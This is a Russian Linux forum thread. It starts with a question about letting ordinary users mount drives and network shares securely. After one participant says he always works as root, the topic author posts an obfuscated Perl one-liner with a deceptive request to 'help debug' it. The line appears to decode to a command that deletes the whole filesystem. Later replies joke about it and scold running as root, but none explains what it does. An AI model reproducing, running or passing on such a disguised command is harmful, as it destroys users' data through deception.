LINUX.ORG.RU

Как нынче модно монтировать флешки и прочие ресурсы?

 


0

1

Сабж. Что я хочу от системы монтирования:

1) для каждого типа ресурса есть конфиг, где описано, с какими параметрами ФС запусать mount. Конфиг доступен для записи только руту.

2) Для каждого пользователя перечислено, какие типы ресурсов (флешки, nfs, smb, etc) ему позволено монтировать.

3) если не указано иного, монтировать может только в принадлежащую пользователю директорию

Есть ли сабж?

★★★★★

Ответ на: комментарий от armbox

У меня есть несколко аккаунтов на своем компе, один основной и один для всяких стимов и прочей проприетарщины. Но монтировать ресурсы надо, причем безопасно, т.к. проприетарщине нет доверия.

cvs-255 ★★★★★
() автор топика
Ответ на: комментарий от armbox

я всегда под root в системе сижу

Помоги, плз, отладить код

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' 
cvs-255 ★★★★★
() автор топика
Ответ на: комментарий от cvs-255

а проприентарщина в тех же иксах? тогда не парься, просто sudo -u warez dolphin

PS: мне за эту программу уже выдали -7. Или -20, не помню…

emulek
()
Ответ на: комментарий от armbox

майнер биткоинов, а закорюки это криптография

anonymous
()
Ответ на: комментарий от armbox

Ньюфаг детектед. Однострочник на перле же. И да, по рукам. Больно. Ломом. Бить. За сидение. Под. Рутом.

DeadEye ★★★★★
()
Ответ на: комментарий от armbox

Сообщения, содержащие вызывающе неверную либо вызывающе неверно интерпретированную информацию, способную привести к развитию нездоровой дискуссии. Мы уважаем чужое мнение, но оставляем за собой право удалять сообщения, безапелляционно сообщающие вызывающе неверные факты.

Делись травой.

DeadEye ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.